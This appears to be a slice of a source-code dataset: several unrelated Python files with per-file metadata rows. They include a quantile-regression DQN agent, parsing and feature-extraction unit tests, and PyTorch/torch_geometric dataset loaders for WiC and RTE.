        self.criterion = nn.MSELoss()
        # Start the target network in sync with the online network.
        self.target_network.load_state_dict(self.network.state_dict())
        self.replay = config.replay_fn()
        self.policy = config.policy_fn()
        self.total_steps = 0
        # Uniform weight used to collapse quantile values to a scalar Q.
        self.quantile_weight = 1.0 / self.config.num_quantiles
        # Quantile midpoints tau_hat_i = (2i + 1) / (2N).
        self.cumulative_density = tensor(
            (2 * np.arange(self.config.num_quantiles) + 1) / (2.0 * self.config.num_quantiles))
    def huber(self, x):
        """Element-wise Huber loss with threshold 1 (no reduction)."""
        cond = (x.abs() < 1.0).float().detach()
        return 0.5 * x.pow(2) * cond + (x.abs() - 0.5) * (1 - cond)
    def evaluation_action(self, state):
        """Greedy action for a single state: mean over quantiles, then argmax."""
        value = self.network.predict(np.stack([self.config.state_normalizer(state)])).squeeze(0).detach()
        value = (value * self.quantile_weight).sum(-1).cpu().detach().numpy().flatten()
        return np.argmax(value)
    def episode(self, deterministic=False):
        """Run one episode and return (total_reward, steps).

        With deterministic=True the agent acts greedily and neither stores
        transitions nor learns.
        """
        episode_start_time = time.time()
        state = self.task.reset()
        total_reward = 0.0
        steps = 0
        while True:
            # Quantile predictions -> scalar Q-values via the uniform mean.
            value = self.network.predict(np.stack([self.config.state_normalizer(state)])).squeeze(0).detach()
            value = (value * self.quantile_weight).sum(-1).cpu().detach().numpy().flatten()
            if deterministic:
                action = np.argmax(value)
            elif self.total_steps < self.config.exploration_steps:
                # Pure random exploration during warm-up.
                action = np.random.randint(0, len(value))
            else:
                action = self.policy.sample(value)
            next_state, reward, done, _ = self.task.step(action)
            total_reward += reward
            reward = self.config.reward_normalizer(reward)
            if not deterministic:
                self.replay.feed([state, action, reward, next_state, int(done)])
                self.total_steps += 1
            steps += 1
            state = next_state
            if not deterministic and self.total_steps > self.config.exploration_steps \
                    and self.total_steps % self.config.sgd_update_frequency == 0:
                experiences = self.replay.sample()
                states, actions, rewards, next_states, terminals = experiences
                states = self.config.state_normalizer(states)
                next_states = self.config.state_normalizer(next_states)
                # Target quantiles for the greedy next action.
                quantiles_next = self.target_network.predict(next_states).detach()
                q_next = (quantiles_next * self.quantile_weight).sum(-1)
                _, a_next = torch.max(q_next, dim=1)
                a_next = a_next.view(-1, 1, 1).expand(-1, -1, quantiles_next.size(2))
                quantiles_next = quantiles_next.gather(1, a_next).squeeze(1)
                rewards = tensor(rewards)
                terminals = tensor(terminals)
                # Bellman backup applied to every target quantile.
                quantiles_next = rewards.view(-1, 1) + self.config.discount * (1 - terminals.view(-1, 1)) * quantiles_next
                quantiles = self.network.predict(states)
                actions = tensor(actions).long()
                actions = actions.view(-1, 1, 1).expand(-1, -1, quantiles.size(2))
                quantiles = quantiles.gather(1, actions).squeeze(1)
                quantiles_next = quantiles_next.t().unsqueeze(-1)
                diff = quantiles_next - quantiles
                # Quantile-regression Huber loss weighted by |tau - 1{diff<0}|.
                loss = self.huber(diff) * (self.cumulative_density.view(1, -1) - (diff.detach() < 0).float()).abs()
                self.optimizer.zero_grad()
                loss.mean(0).mean(1).sum().backward()
                self.optimizer.step()
                self.evaluate()
            # Periodically sync the target network with the online network.
            if not deterministic and self.total_steps % self.config.target_network_update_freq == 0:
                self.target_network.load_state_dict(self.network.state_dict())
            if not deterministic and self.total_steps > self.config.exploration_steps:
                self.policy.update_epsilon()
            if done:
                break
        episode_time = time.time() - episode_start_time
        self.config.logger.debug('episode steps %d, episode time %f, time per step %f' %
                                 (steps, episode_time, episode_time / float(steps)))
        return total_reward, steps
| 50.729097
| 159
| 0.600079
| 1,814
| 15,168
| 4.840132
| 0.084895
| 0.068337
| 0.033485
| 0.051253
| 0.95672
| 0.952733
| 0.95
| 0.946469
| 0.927221
| 0.927221
| 0
| 0.016361
| 0.270636
| 15,168
| 298
| 160
| 50.899329
| 0.777276
| 0.020372
| 0
| 0.897638
| 0
| 0
| 0.010402
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.047244
| false
| 0
| 0.019685
| 0
| 0.114173
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2bd7046e384423d88e4ca85153a3e4866f72996b
| 138
|
py
|
Python
|
jupyterlab_iframe/tests/test_all.py
|
djangoliv/jupyterlab_iframe
|
b78edc56c04caed9cbfd041d84cec8560ca324cc
|
[
"Apache-2.0"
] | 82
|
2018-03-14T09:48:39.000Z
|
2022-03-07T16:50:56.000Z
|
jupyterlab_iframe/tests/test_all.py
|
djangoliv/jupyterlab_iframe
|
b78edc56c04caed9cbfd041d84cec8560ca324cc
|
[
"Apache-2.0"
] | 94
|
2018-03-12T03:17:52.000Z
|
2022-03-20T17:36:50.000Z
|
jupyterlab_iframe/tests/test_all.py
|
djangoliv/jupyterlab_iframe
|
b78edc56c04caed9cbfd041d84cec8560ca324cc
|
[
"Apache-2.0"
] | 19
|
2018-04-10T02:09:07.000Z
|
2021-07-16T03:40:30.000Z
|
# for Coverage
from jupyterlab_iframe.__init__ import * # noqa: F401, F403
from jupyterlab_iframe.extension import * # noqa: F401, F403
| 34.5
| 61
| 0.768116
| 18
| 138
| 5.555556
| 0.611111
| 0.28
| 0.4
| 0.36
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.102564
| 0.152174
| 138
| 3
| 62
| 46
| 0.752137
| 0.333333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
a61a60a113b6c2a91580dceea77cb52814389840
| 1,794
|
py
|
Python
|
tests/test_utils_parse.py
|
DerThorsten/kipoi-utils
|
1fc373a1cbed4fa2151344bc3d34c59c9568e9af
|
[
"MIT"
] | null | null | null |
tests/test_utils_parse.py
|
DerThorsten/kipoi-utils
|
1fc373a1cbed4fa2151344bc3d34c59c9568e9af
|
[
"MIT"
] | 8
|
2019-07-13T16:04:30.000Z
|
2022-03-17T12:41:26.000Z
|
tests/test_utils_parse.py
|
DerThorsten/kipoi-utils
|
1fc373a1cbed4fa2151344bc3d34c59c9568e9af
|
[
"MIT"
] | 2
|
2019-09-27T15:43:52.000Z
|
2020-07-13T19:25:43.000Z
|
from kipoi_utils.utils import parse_json_file_str_or_arglist
import tempfile
def test_parse_json_file_str_or_arglist_from_json():
    """A single JSON document string is parsed into the expected dict."""
    json_doc = """{
        "key_a":1.0,
        "key_b":true,
        "key_c":["hello", 42],
        "key_d":"42"
    }
    """
    res = parse_json_file_str_or_arglist([json_doc])
    expected = {
        'key_a': 1.0,
        'key_b': True,
        'key_c': ["hello", 42],
        'key_d': "42",
    }
    assert res == expected
def test_parse_json_file_str_or_arglist_from_arglist():
    """key=value argument strings are parsed into the expected dict."""
    args = [
        "key_a=1.0",
        "key_b=True",
        """key_c=["hello",42]""",
        """key_d='42'""",
    ]
    res = parse_json_file_str_or_arglist(args)
    expected = {
        'key_a': 1.0,
        'key_b': True,
        'key_c': ["hello", 42],
        'key_d': "42",
    }
    assert res == expected
def test_parse_json_file_str_or_arglist_from_file():
    """A single file path argument is read and parsed as JSON.

    Renamed: this test was previously also named
    test_parse_json_file_str_or_arglist_from_arglist, which shadowed the
    arglist test above so pytest never collected it.
    """
    json_str = """{
        "key_a":1.0,
        "key_b":true,
        "key_c":["hello", 42],
        "key_d":"42"
    }
    """
    # tempfile is already imported at module level; no local import needed.
    tmp = tempfile.NamedTemporaryFile()
    # Open the file for writing.
    with open(tmp.name, 'w') as f:
        f.write(json_str)
    res = parse_json_file_str_or_arglist([tmp.name])
    assert 'key_a' in res
    assert res['key_a'] == 1.0
    assert 'key_b' in res
    assert res['key_b'] == True
    assert 'key_c' in res
    assert res['key_c'] == ["hello", 42]
    assert 'key_d' in res
    assert res['key_d'] == "42"
    assert len(res) == 4
| 18.6875
| 60
| 0.568562
| 277
| 1,794
| 3.368231
| 0.151625
| 0.115756
| 0.141479
| 0.180064
| 0.836013
| 0.836013
| 0.809218
| 0.779207
| 0.779207
| 0.740622
| 0
| 0.030233
| 0.280936
| 1,794
| 96
| 61
| 18.6875
| 0.693023
| 0.014493
| 0
| 0.706897
| 0
| 0
| 0.21714
| 0
| 0
| 0
| 0
| 0
| 0.465517
| 1
| 0.051724
| false
| 0
| 0.051724
| 0
| 0.103448
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
a62638e38c350f74ced4672c471dffc011ffd4c6
| 114
|
py
|
Python
|
neuroBN/inference/marginal_exact/__init__.py
|
Centiment-io/neuroBN
|
0863efd03f5cc79a2084efcc592d34969c16d4a4
|
[
"Apache-2.0"
] | 1
|
2018-09-04T09:32:07.000Z
|
2018-09-04T09:32:07.000Z
|
neuroBN/inference/marginal_exact/__init__.py
|
Centiment-io/neuroBN
|
0863efd03f5cc79a2084efcc592d34969c16d4a4
|
[
"Apache-2.0"
] | null | null | null |
neuroBN/inference/marginal_exact/__init__.py
|
Centiment-io/neuroBN
|
0863efd03f5cc79a2084efcc592d34969c16d4a4
|
[
"Apache-2.0"
] | 2
|
2019-10-03T21:23:09.000Z
|
2020-03-21T11:12:56.000Z
|
from neuroBN.inference.marginal_exact.exact_bp import *
from neuroBN.inference.marginal_exact.ve_marginal import *
| 57
| 58
| 0.868421
| 16
| 114
| 5.9375
| 0.5
| 0.231579
| 0.421053
| 0.589474
| 0.694737
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.061404
| 114
| 2
| 58
| 57
| 0.88785
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
a6a09515b0915c221c0f65434350957ef5da1354
| 9,904
|
py
|
Python
|
protlearn/features/tests/test_ctdd.py
|
tadorfer/ProtClass
|
da1a01ea9abd3c367b3389dfed683c6a9dfa6afd
|
[
"MIT"
] | 24
|
2020-09-17T10:35:44.000Z
|
2022-03-09T19:19:01.000Z
|
protlearn/features/tests/test_ctdd.py
|
tadorfer/ProtClass
|
da1a01ea9abd3c367b3389dfed683c6a9dfa6afd
|
[
"MIT"
] | 14
|
2020-08-09T18:23:01.000Z
|
2020-11-19T05:48:14.000Z
|
protlearn/features/tests/test_ctdd.py
|
tadorfer/ProtClass
|
da1a01ea9abd3c367b3389dfed683c6a9dfa6afd
|
[
"MIT"
] | 3
|
2021-03-07T23:41:17.000Z
|
2022-02-25T18:48:37.000Z
|
import pytest
import numpy as np
from ..ctdd import ctdd
import pkg_resources
PATH = pkg_resources.resource_filename(__name__, 'test_data/')
def test_ctdd():
    """Test CTD distribution.

    Checks that ``ctdd`` reproduces the expected distribution descriptors for
    three known sequences, and raises ValueError on a sequence containing
    non-amino-acid characters.
    """
    # load data (context manager so the file handle is closed deterministically;
    # the original left the file object from open(...) unclosed)
    with open(PATH+'multiple.txt') as fh:
        X_list = fh.read().splitlines()
    X_err = 'AGT2HT9'
    # get ctdd
    ctdd_list, desc = ctdd(X_list)
    # test ctdd against the precomputed reference descriptors (one row per sequence)
    np.testing.assert_almost_equal(ctdd_list,
        np.array([[ 0. , 0. , 0. , 0. ,
        0. , 14.28571429, 14.28571429, 28.57142857,
        42.85714286, 57.14285714, 71.42857143, 100. ,
        71.42857143, 85.71428571, 100. , 42.85714286,
        57.14285714, 42.85714286, 42.85714286, 57.14285714,
        14.28571429, 14.28571429, 28.57142857, 71.42857143,
        100. , 0. , 0. , 0. ,
        0. , 0. , 42.85714286, 71.42857143,
        42.85714286, 57.14285714, 71.42857143, 14.28571429,
        28.57142857, 14.28571429, 14.28571429, 28.57142857,
        85.71428571, 100. , 85.71428571, 85.71428571,
        100. , 42.85714286, 57.14285714, 42.85714286,
        42.85714286, 57.14285714, 0. , 0. ,
        0. , 0. , 0. , 14.28571429,
        14.28571429, 28.57142857, 71.42857143, 100. ,
        57.14285714, 57.14285714, 57.14285714, 57.14285714,
        57.14285714, 14.28571429, 42.85714286, 14.28571429,
        28.57142857, 42.85714286, 71.42857143, 100. ,
        71.42857143, 85.71428571, 100. , 42.85714286,
        57.14285714, 42.85714286, 42.85714286, 57.14285714,
        14.28571429, 71.42857143, 14.28571429, 28.57142857,
        71.42857143, 85.71428571, 100. , 85.71428571,
        85.71428571, 100. , 14.28571429, 42.85714286,
        14.28571429, 28.57142857, 42.85714286, 57.14285714,
        57.14285714, 57.14285714, 57.14285714, 57.14285714,
        71.42857143, 100. , 71.42857143, 85.71428571,
        100. , 14.28571429, 28.57142857, 14.28571429,
        14.28571429, 28.57142857, 85.71428571, 100. ,
        85.71428571, 85.71428571, 100. , 42.85714286,
        71.42857143, 42.85714286, 57.14285714, 71.42857143,
        71.42857143, 100. , 71.42857143, 85.71428571,
        100. , 14.28571429, 28.57142857, 14.28571429,
        14.28571429, 28.57142857, 42.85714286, 57.14285714,
        42.85714286, 42.85714286, 57.14285714, 14.28571429,
        28.57142857, 14.28571429, 14.28571429, 28.57142857,
        85.71428571, 100. , 85.71428571, 85.71428571,
        100. , 42.85714286, 71.42857143, 42.85714286,
        57.14285714, 71.42857143, 42.85714286, 57.14285714,
        42.85714286, 42.85714286, 57.14285714, 14.28571429,
        14.28571429, 28.57142857, 71.42857143, 100. ,
        0. , 0. , 0. , 0. ,
        0. , 14.28571429, 14.28571429, 42.85714286,
        57.14285714, 100. , 71.42857143, 71.42857143,
        71.42857143, 71.42857143, 71.42857143, 0. ,
        0. , 0. , 0. , 0. ,
        14.28571429, 14.28571429, 28.57142857, 85.71428571,
        100. , 42.85714286, 57.14285714, 42.85714286,
        42.85714286, 57.14285714, 71.42857143, 71.42857143,
        71.42857143, 71.42857143, 71.42857143],
        [ 22.22222222, 22.22222222, 55.55555556, 77.77777778,
        100. , 44.44444444, 44.44444444, 44.44444444,
        44.44444444, 44.44444444, 11.11111111, 11.11111111,
        33.33333333, 66.66666667, 88.88888889, 22.22222222,
        22.22222222, 66.66666667, 77.77777778, 100. ,
        11.11111111, 33.33333333, 11.11111111, 11.11111111,
        33.33333333, 44.44444444, 44.44444444, 44.44444444,
        44.44444444, 44.44444444, 22.22222222, 22.22222222,
        55.55555556, 66.66666667, 88.88888889, 77.77777778,
        100. , 77.77777778, 77.77777778, 100. ,
        11.11111111, 44.44444444, 11.11111111, 33.33333333,
        44.44444444, 22.22222222, 55.55555556, 22.22222222,
        22.22222222, 55.55555556, 66.66666667, 66.66666667,
        77.77777778, 88.88888889, 100. , 11.11111111,
        44.44444444, 11.11111111, 33.33333333, 44.44444444,
        22.22222222, 22.22222222, 55.55555556, 66.66666667,
        88.88888889, 77.77777778, 100. , 77.77777778,
        77.77777778, 100. , 11.11111111, 44.44444444,
        11.11111111, 33.33333333, 44.44444444, 22.22222222,
        55.55555556, 22.22222222, 22.22222222, 55.55555556,
        66.66666667, 66.66666667, 77.77777778, 88.88888889,
        100. , 11.11111111, 44.44444444, 11.11111111,
        33.33333333, 44.44444444, 22.22222222, 22.22222222,
        55.55555556, 77.77777778, 100. , 44.44444444,
        44.44444444, 44.44444444, 44.44444444, 44.44444444,
        11.11111111, 11.11111111, 33.33333333, 66.66666667,
        88.88888889, 44.44444444, 44.44444444, 66.66666667,
        77.77777778, 100. , 11.11111111, 33.33333333,
        11.11111111, 22.22222222, 33.33333333, 0. ,
        0. , 0. , 0. , 0. ,
        11.11111111, 44.44444444, 11.11111111, 33.33333333,
        44.44444444, 66.66666667, 66.66666667, 77.77777778,
        88.88888889, 100. , 22.22222222, 55.55555556,
        22.22222222, 22.22222222, 55.55555556, 55.55555556,
        100. , 55.55555556, 77.77777778, 100. ,
        11.11111111, 11.11111111, 33.33333333, 44.44444444,
        88.88888889, 0. , 0. , 0. ,
        0. , 0. , 0. , 0. ,
        0. , 0. , 0. , 11.11111111,
        11.11111111, 44.44444444, 77.77777778, 100. ,
        22.22222222, 55.55555556, 22.22222222, 22.22222222,
        55.55555556, 11.11111111, 33.33333333, 11.11111111,
        22.22222222, 33.33333333, 44.44444444, 44.44444444,
        44.44444444, 44.44444444, 44.44444444, 55.55555556,
        55.55555556, 66.66666667, 77.77777778, 100. ,
        11.11111111, 11.11111111, 33.33333333, 44.44444444,
        100. , 22.22222222, 55.55555556, 22.22222222,
        22.22222222, 55.55555556, 66.66666667, 88.88888889,
        66.66666667, 66.66666667, 88.88888889],
        [ 62.5 , 100. , 62.5 , 87.5 ,
        100. , 12.5 , 12.5 , 25. ,
        37.5 , 75. , 0. , 0. ,
        0. , 0. , 0. , 12.5 ,
        12.5 , 62.5 , 87.5 , 100. ,
        25. , 50. , 25. , 37.5 ,
        50. , 75. , 75. , 75. ,
        75. , 75. , 12.5 , 12.5 ,
        62.5 , 87.5 , 100. , 25. ,
        50. , 25. , 37.5 , 50. ,
        75. , 75. , 75. , 75. ,
        75. , 12.5 , 100. , 12.5 ,
        87.5 , 100. , 62.5 , 62.5 ,
        62.5 , 62.5 , 62.5 , 25. ,
        25. , 37.5 , 50. , 75. ,
        62.5 , 100. , 62.5 , 87.5 ,
        100. , 12.5 , 12.5 , 25. ,
        37.5 , 50. , 75. , 75. ,
        75. , 75. , 75. , 12.5 ,
        12.5 , 62.5 , 87.5 , 100. ,
        25. , 50. , 25. , 37.5 ,
        50. , 75. , 75. , 75. ,
        75. , 75. , 12.5 , 12.5 ,
        37.5 , 62.5 , 100. , 75. ,
        75. , 75. , 75. , 75. ,
        0. , 0. , 0. , 0. ,
        0. , 25. , 25. , 50. ,
        75. , 100. , 62.5 , 62.5 ,
        62.5 , 62.5 , 62.5 , 12.5 ,
        12.5 , 12.5 , 12.5 , 12.5 ,
        75. , 75. , 75. , 75. ,
        75. , 25. , 50. , 25. ,
        37.5 , 50. , 12.5 , 12.5 ,
        62.5 , 87.5 , 100. , 25. ,
        25. , 37.5 , 50. , 100. ,
        62.5 , 75. , 62.5 , 62.5 ,
        75. , 12.5 , 12.5 , 12.5 ,
        12.5 , 12.5 , 12.5 , 12.5 ,
        12.5 , 12.5 , 12.5 , 25. ,
        25. , 37.5 , 50. , 75. ,
        87.5 , 100. , 87.5 , 87.5 ,
        100. , 12.5 , 12.5 , 25. ,
        37.5 , 50. , 75. , 75. ,
        75. , 75. , 75. , 62.5 ,
        100. , 62.5 , 87.5 , 100. ,
        25. , 25. , 37.5 , 50. ,
        75. , 12.5 , 12.5 , 62.5 ,
        87.5 , 100. , 0. , 0. ,
        0. , 0. , 0. ]])
    , decimal=3)
    # test ValueError: non-amino-acid characters must be rejected
    with pytest.raises(ValueError):
        ctdd_error, desc = ctdd(X_err)
| 57.918129
| 70
| 0.41559
| 1,055
| 9,904
| 3.88436
| 0.074882
| 0.021962
| 0.025622
| 0.024402
| 0.864812
| 0.857491
| 0.84041
| 0.829429
| 0.818204
| 0.795998
| 0
| 0.702991
| 0.459814
| 9,904
| 171
| 71
| 57.918129
| 0.062991
| 0.006765
| 0
| 0.329193
| 0
| 0
| 0.005073
| 0
| 0
| 0
| 0
| 0
| 0.006211
| 1
| 0.006211
| false
| 0
| 0.024845
| 0
| 0.031056
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
a6a92609b15f2018096022b7800d224711b8f470
| 80,372
|
py
|
Python
|
src/data_loader.py
|
uhh-lt/DT2ContextRep
|
5e04bb5abc10eee895dd85e82fb0d2132d4939e1
|
[
"MIT"
] | null | null | null |
src/data_loader.py
|
uhh-lt/DT2ContextRep
|
5e04bb5abc10eee895dd85e82fb0d2132d4939e1
|
[
"MIT"
] | null | null | null |
src/data_loader.py
|
uhh-lt/DT2ContextRep
|
5e04bb5abc10eee895dd85e82fb0d2132d4939e1
|
[
"MIT"
] | null | null | null |
import os
from tqdm import tqdm
import torch
from torch.utils.data import Dataset
from torch_geometric.data import Data
from torch_geometric.data import Dataset as GraphDataset
from torch_geometric.data import DataLoader as GraphDataLoader
from transformers import AutoTokenizer
import utils
import config
class WrapperDataset(Dataset):
    """Zips several equal-length datasets into one.

    Indexing returns a tuple holding the idx-th item of every wrapped
    dataset, in the order the datasets were passed to the constructor.
    """
    def __init__(self, *datasets):
        # Require at least one dataset first: with zero datasets the
        # equal-length check below would pass vacuously.
        assert(len(datasets) > 0)
        # Every wrapped dataset must have the same length as the first.
        assert(all(len(dataset) == len(datasets[0]) for dataset in datasets))
        # Idiomatic copy instead of the original manual append loop.
        self.datasets = list(datasets)
    def __len__(self):
        # All datasets are equal-length, so the first one is representative.
        return len(self.datasets[0])
    def __getitem__(self, idx):
        # One item per wrapped dataset, preserving constructor order.
        return tuple(dataset[idx] for dataset in self.datasets)
class WiCLMDataset(Dataset):
    """Word-in-Context sentence pairs encoded for a transformer LM.

    Each item is the (input_ids, token_type_ids, attention_mask) encoding of
    the lower-cased context pair, padded/truncated to ``max_length``.
    """
    max_length = 80
    def __init__(self, data_frame, tokenizer):
        self.data_frame = data_frame
        self.tokenizer = tokenizer
        # The fixed padding target must fit within the tokenizer's own limit.
        assert(self.max_length <= self.tokenizer.model_max_length)
    def _compute_max_length(self):
        # Diagnostic scan: report the longest encoded pair in the frame.
        print(f'Computing max length (sub-word + special tokens) on WiC dataset')
        longest = 0
        total_rows = self.data_frame.shape[0]
        for _, row in tqdm(self.data_frame.iterrows(), total=total_rows):
            encoded = self.tokenizer.encode(row['context_1'].lower(), row['context_2'].lower(), add_special_tokens=True)
            if len(encoded) > longest:
                longest = len(encoded)
        # Clamp to the tokenizer's hard limit before reporting.
        max_length = min(longest, self.tokenizer.model_max_length)
        print(f'Max length (sub-word + special tokens) on WiC dataset: {max_length}')
    def __len__(self):
        # One example per data-frame row.
        return self.data_frame.shape[0]
    def __getitem__(self, idx):
        row = self.data_frame.iloc[idx, :]
        pair = [row['context_1'].lower(), row['context_2'].lower()]
        input_ids, token_type_ids, attention_mask = utils.get_sentences_encoded_dict(self.tokenizer, pair, self.max_length)
        return input_ids, token_type_ids, attention_mask
class WiCAuxDataset(GraphDataset):
    """Graph-side (auxiliary) view of the WiC data for torch_geometric.

    Builds one `Data` object per row — for the sentence selected by the
    `is_sentence_*` flag — and caches it as `aux_{1|2}_{row}.pt` under `root`.
    """
    def __init__(self, root, data_frame, DT_G, is_sentence_1=False, is_sentence_2=False, transform=None, pre_transform=None):
        # NOTE(review): attributes must be assigned before super().__init__(),
        # which is expected to consult processed_file_names/process() — confirm
        # against the installed torch_geometric version.
        self.data_frame = data_frame
        self.DT_G = DT_G
        # Exactly one of the two sentence flags must be set.
        assert(sum([is_sentence_1, is_sentence_2]) == 1)
        self.is_sentence_1 = is_sentence_1
        self.is_sentence_2 = is_sentence_2
        super(WiCAuxDataset, self).__init__(root, transform, pre_transform)
        print(f'Loaded processed WiC Aux dataset from {root}')
    @property
    def raw_file_names(self):
        # No raw files: graphs are built directly from the data frame.
        return []
    @property
    def processed_file_names(self):
        # One cached file per row; the prefix encodes which sentence this is.
        if(self.is_sentence_1):
            return [f'aux_1_{i}.pt' for i in range(self.data_frame.shape[0])]
        elif(self.is_sentence_2):
            return [f'aux_2_{i}.pt' for i in range(self.data_frame.shape[0])]
    def process(self):
        # Build and persist one graph Data object per data-frame row.
        for row_index, row in tqdm(self.data_frame.iterrows(), total=self.data_frame.shape[0]):
            label = row['label']
            # 'indices' holds the two target-word positions as "i-j".
            index_1, index_2 = list(map(int, row['indices'].split('-')))
            if(self.is_sentence_1):
                context = row['context_1']
                word_loc = index_1
            elif(self.is_sentence_2):
                context = row['context_2']
                word_loc = index_2
            context = context.lower()
            # Edge structure comes from the DT graph; semantics live in
            # utils.setup_graph_edges.
            edge_index, edge_attr = utils.setup_graph_edges(self.DT_G, context)
            data = Data()
            data['edge_index'] = edge_index.to(config.device)
            data['edge_attr'] = edge_attr.to(config.device)
            data['y'] = utils.get_label_embedding(label, config.WiC_labels).to(config.device)
            data['word_loc'] = torch.LongTensor([word_loc]).to(config.device)
            data['sentence'] = context
            # One node per whitespace-separated token.
            data.num_nodes = len(context.split())
            if(self.pre_filter is not None and not self.pre_filter(data)):
                continue
            if(self.pre_transform is not None):
                data = self.pre_transform(data)
            if(self.is_sentence_1):
                torch.save(data, os.path.join(self.processed_dir, f'aux_1_{row_index}.pt'))
            elif(self.is_sentence_2):
                torch.save(data, os.path.join(self.processed_dir, f'aux_2_{row_index}.pt'))
    def len(self):
        return len(self.processed_file_names)
    def get(self, idx):
        # Load the cached graph for the sentence selected at construction.
        if(self.is_sentence_1):
            data = torch.load(os.path.join(self.processed_dir, f'aux_1_{idx}.pt'))
        elif(self.is_sentence_2):
            data = torch.load(os.path.join(self.processed_dir, f'aux_2_{idx}.pt'))
        return data
class RTELMDataset(Dataset):
    """RTE premise/hypothesis pairs encoded for a transformer LM.

    Each item is the (input_ids, token_type_ids, attention_mask) encoding of
    the lower-cased sentence pair, padded/truncated to ``max_length``.
    """
    max_length = 307
    def __init__(self, data_frame, tokenizer):
        self.data_frame = data_frame
        self.tokenizer = tokenizer
        # The fixed padding target must fit within the tokenizer's own limit.
        assert(self.max_length <= self.tokenizer.model_max_length)
    def _compute_max_length(self):
        # Diagnostic scan: report the longest encoded pair in the frame.
        print(f'Computing max length (sub-word + special tokens) on RTE dataset')
        longest = 0
        total_rows = self.data_frame.shape[0]
        for _, row in tqdm(self.data_frame.iterrows(), total=total_rows):
            encoded = self.tokenizer.encode(row['sentence1'].lower(), row['sentence2'].lower(), add_special_tokens=True)
            longest = max(longest, len(encoded))
        # Clamp to the tokenizer's hard limit before reporting.
        max_length = min(longest, self.tokenizer.model_max_length)
        print(f'Max length (sub-word + special tokens) on RTE dataset: {max_length}')
    def __len__(self):
        # One example per data-frame row.
        return self.data_frame.shape[0]
    def __getitem__(self, idx):
        row = self.data_frame.iloc[idx, :]
        pair = [row['sentence1'].lower(), row['sentence2'].lower()]
        input_ids, token_type_ids, attention_mask = utils.get_sentences_encoded_dict(self.tokenizer, pair, self.max_length)
        return input_ids, token_type_ids, attention_mask
class RTEAuxDataset(GraphDataset):
    """Graph-side (auxiliary) view of the RTE data for torch_geometric.

    Builds one `Data` object per row — for the sentence selected by the
    `is_sentence_*` flag — and caches it as `aux_{1|2}_{row}.pt` under `root`.
    """
    def __init__(self, root, data_frame, DT_G, is_sentence_1=False, is_sentence_2=False, transform=None, pre_transform=None):
        # NOTE(review): attributes must be assigned before super().__init__(),
        # which is expected to consult processed_file_names/process() — confirm
        # against the installed torch_geometric version.
        self.data_frame = data_frame
        self.DT_G = DT_G
        # Exactly one of the two sentence flags must be set.
        assert(sum([is_sentence_1, is_sentence_2]) == 1)
        self.is_sentence_1 = is_sentence_1
        self.is_sentence_2 = is_sentence_2
        super(RTEAuxDataset, self).__init__(root, transform, pre_transform)
        print(f'Loaded processed RTE dataset from {root}')
    @property
    def raw_file_names(self):
        # No raw files: graphs are built directly from the data frame.
        return []
    @property
    def processed_file_names(self):
        # One cached file per row; the prefix encodes which sentence this is.
        if(self.is_sentence_1):
            return [f'aux_1_{i}.pt' for i in range(self.data_frame.shape[0])]
        elif(self.is_sentence_2):
            return [f'aux_2_{i}.pt' for i in range(self.data_frame.shape[0])]
    def process(self):
        # Build and persist one graph Data object per data-frame row.
        for row_index, row in tqdm(self.data_frame.iterrows(), total=self.data_frame.shape[0]):
            label = row['label']
            if(self.is_sentence_1):
                context = row['sentence1']
            elif(self.is_sentence_2):
                context = row['sentence2']
            context = context.lower()
            edge_index, edge_attr = utils.setup_graph_edges(self.DT_G, context)
            data = Data()
            data['edge_index'] = edge_index.to(config.device)
            data['edge_attr'] = edge_attr.to(config.device)
            data['y'] = utils.get_label_embedding(label, config.RTE_labels).to(config.device)
            data['sentence'] = context
            # One node per whitespace-separated token.
            data.num_nodes = len(context.split())
            if(self.pre_filter is not None and not self.pre_filter(data)):
                continue
            if(self.pre_transform is not None):
                data = self.pre_transform(data)
            if(self.is_sentence_1):
                torch.save(data, os.path.join(self.processed_dir, f'aux_1_{row_index}.pt'))
            elif(self.is_sentence_2):
                torch.save(data, os.path.join(self.processed_dir, f'aux_2_{row_index}.pt'))
    def len(self):
        return len(self.processed_file_names)
    def get(self, idx):
        # Load the cached graph for the sentence selected at construction.
        if(self.is_sentence_1):
            data = torch.load(os.path.join(self.processed_dir, f'aux_1_{idx}.pt'))
        elif(self.is_sentence_2):
            data = torch.load(os.path.join(self.processed_dir, f'aux_2_{idx}.pt'))
        return data
class STS_BLMDataset(Dataset):
    """STS-B sentence pairs encoded for a transformer LM.

